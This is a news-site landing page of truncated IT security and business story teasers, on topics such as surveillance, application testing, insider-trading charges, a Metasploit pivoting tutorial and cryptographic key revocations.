There has to be a better way

IT Security Insider

Subscribe to IT Security Insider: eMailAlertsEmail Alerts newslettersWeekly Newsletters
Get IT Security Insider: homepageHomepage mobileMobile rssRSS facebookFacebook twitterTwitter linkedinLinkedIn


Top Stories

Conspiracy theorists and other concerned citizens will insist the government is watching every keystroke, keeping a record of every website, transaction, text and email. Shades of 1984’s Big Brother, right? These last few weeks, the news has been brimming with revelations of data surveillance and monitoring by the government (not to mention data harvesting corporations like Google, Yahoo, Facebook etc…). Everyone, including the security buffs at CloudAccess, is sensitive as to what is being looked at, stored, and analyzed for hazily defined purposes. Privacy is no longer as private as you think; and hasn’t been for many years. Politics, ethics and debates over 4th amendment interpretation aside (as they serve no useful purpose in this analysis), a question was asked on one the security forums that in light of these alleged breaches of trust, whether cloud security... (more)

Test All Apps to Keep Hackers from Penetrating Castle Walls

Despite all the news about hackers infiltrating major corporations, most businesses continue to leave themselves woefully unprotected. Some surveys estimate more than 70% of businesses perform vulnerability tests on less than 10% of their cloud, mobile and web applications. A majority also confess they have been hacked at least once in the last two years. While most large businesses have begun application vulnerability testing, there is still a long way to go. After all, you are only as strong as your weakest link; hackers will undoubtedly find and attack any application without sufficient defenses. Although testing and creating protection for high-value and mission-critical applications is better than not doing anything at all, leaving low-priority applications unprotected is still a major risk. If hackers can exploit just one application, that means they can then ... (more)

Cybersecurity: It’s More Than Worms, Hacking and Phishing

To put things into perspective, let’s analogize about some information technology related initiatives.  In the realm of things, accounting is like a lake, integration is like a bay and cyber security is like the Pacific Ocean.  The scope of understanding required to be a cyber security expert is so vast that it fills volumes just trying to define it, let alone protect it. The reason cyber security is so vast is that it is a strategy for mitigating risk from breach of confidentiality, lack of integrity and lack of availability of information systems and networks.  Consider the number of threats that target these three things and then consider this number is only the known threats.  Also, know that new threats are being uncovered daily.  Moreover, threats are not all technological, some of them are socially engineered, which make them all that more difficult to defend ... (more)

Microsoft Accuses Salesforce Recruit of Stealing Its Cloud Computing Plans

Remember that Microsoft guy that Salesforce hired, the one that Microsoft sued to hold him to his non-compete? Well, last Thursday Microsoft told the Washington State Superior Court that gave Microsoft its temporary restraining order a few weeks ago that Matt Miszewski, who Salesforce hired to run its global CRM government business, the same job he had at Microsoft, had stolen its cloud plans. It said it found Miszewski in possession of 25,000 pages of its closely held 2011 sales strategies, internal playbooks, competitive analyses and marketing materials during discovery and that when he resigned from Microsoft on December 31 that Miszewski swore he was only taking personal property with him. The 900 files (600MB) were on his computer. Microsoft, which wants the restraining order turned into a preliminary injunction, told the court that Miszewski's employment at C... (more)

Ex-McKinsey Chief Charged as Galleon Tipster

The SEC Tuesday filed civil charges against the secrets-laden former head of McKinsey & Co Rajat Gupta accusing him of leaking inside information to the notorious hedge fund trader Raja Rajaratnam, whose criminal trial for insider trading and securities fraud starts next week. Gupta allegedly tipped Rajaratnam to Warren Buffet's $5 billion Berkshire Hathaway investment in Goldman Sachs in 2008 at the height of the financial meltdown. Gupta was privy to what was going on by virtue of his seat on Goldman's board and regulators say he told Rajaratnam the moment the board approved the deal via a conference call. Already informed by Gupta that the deal was in the works, Rajaratnam instantly bought another 175,000 shares of Goldman Sachs minutes before the market closed and sold them the next day when the deal was announced and they went up. Gupta also supposedly leaked... (more)

Post Exploitation Using Metasploit Pivot and Port Forward

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task. A very nice feature in Metasploit is the ability to pivot through a Meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a Meterpreter session on a foreign box. We begin right after a client side exploit has been achieved from an attacker machine running Ubuntu Linux to the victim machine running Windows XP. 1. Introduction The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities that assist in performing a penet... (more)

Yahoo Investor Pegs Company as ‘Illogical Alice in Wonderland’

Yahoo said late Sunday that it has named three independent board members in an attempt to foil Third Point, its largest stockholder, from staging a proxy fight at the next stockholders meeting whenever that is. Third Point said it offered "several significant compromises to strike a deal and avoid a proxy contest. Today, the board has shown yet again that they are unable to execute deals that are in the company's best interests. Sadly for shareholders - who will once more bear the costs - the consequence of the board's refusal to accept Third Point's shareholder-friendly proposals will be a time-consuming and distracting proxy contest that the company can ill-afford....In the absence of independent shareholder oversight, the Yahoo boards of the past five years have given shareholders five CEOs and strategic plans in as many years and seriously damaged the value of th... (more)

Taking a Holistic Approach to IT Security

Welcome to the latest edition of the HP Discover Performance Podcast Series. Our next discussion examines how regional healthcare services provider Lake Health in Ohio has matured from deploying security technologies to becoming more of a comprehensive risk-reduction practice provider internally for its own consumers. We learn how Lake Health's Information Security Officer has been expanding the breadth and depth of risk management there to a more holistic level -- and we're even going to discuss how they've gone about deciding which risk and compliance services to seek from outside providers, and which to retain and keep on-premises. Here to explore these and other security-related enterprise IT issues, we're joined by our co-hosts for this sponsored podcast, Chief Software Evangelist at HP, Paul Muller, and Raf Los, Chief Security Evangelist at HP. And we also we... (more)

Shadow IT – The Reality Is Here

A recent survey has shown that security policies and rules set down by IT departments are not just being ignored but having a bus driven through them by staff and senior executives, who wish to bring their own device to work so that they can do more, work smarter and be in touch all of the time. The survey shows that almost three-quarters of respondents would not bet against their own organization having a data breach within the next 12 months. This along with other responses shows that the IT Department of 2013 is a long way from the IT Department of just five years ago, where what they said may not have been liked but was generally adhered to and, if it was not, sanctions could come into effect. Today's rise in BYOD means that every user is in effect his or her own IT department, able to bring in and out of the office just about any file they see fit. Even if an... (more)

Time to Ditch Cryptographic Keys?

What is the most secure way to authenticate electronic data? Until recently, many technical people would have answered ‘cryptographic keys' without blinking. But recent headline events - and a ‘biggie' last year - have raised serious doubts about the ability of cryptographic keys to protect vital government and corporate data. Here are two examples from February that should make CIOs, CTOs and CSOs tremble in their boardrooms: McAfee revoking keys for signing apps on the Apple store; and stolen keys from Bit9 being used to sign malware. In the McAfee case, a McAfee administrator revoked (by mistake) the digital key for certifying desktop apps that run on Apple's OS X, thereby creating serious problems for customers who wanted to install or upgrade Mac antivirus products. The original Arstechnica article (McAfee revoking keys) noted that the administrator intended ... (more)

The New Standard: Intelligence-Driven Security

In a recent blog post, Art Coviello, the executive chairman at RSA, posed an important question. How do we move from traditional security to intelligence-driven security? In his answer he described that the quickly interdependent exchanges between parties (B2C, B2B, B2P, etc) have grown beyond the traditional means of securing the enterprise: “IT organizations have continued to construct security infrastructures around a disintegrating perimeter of increasingly ineffective controls.” He described a new-model of cyber-security that includes five concepts: A thorough understanding of risk The use of agile controls based on pattern recognition and predictive analytics The use of big data analytics to give context to vast streams of data to produce timely, actionable information Personnel with the right skill set to operate the systems Information sharing at scale I hav... (more)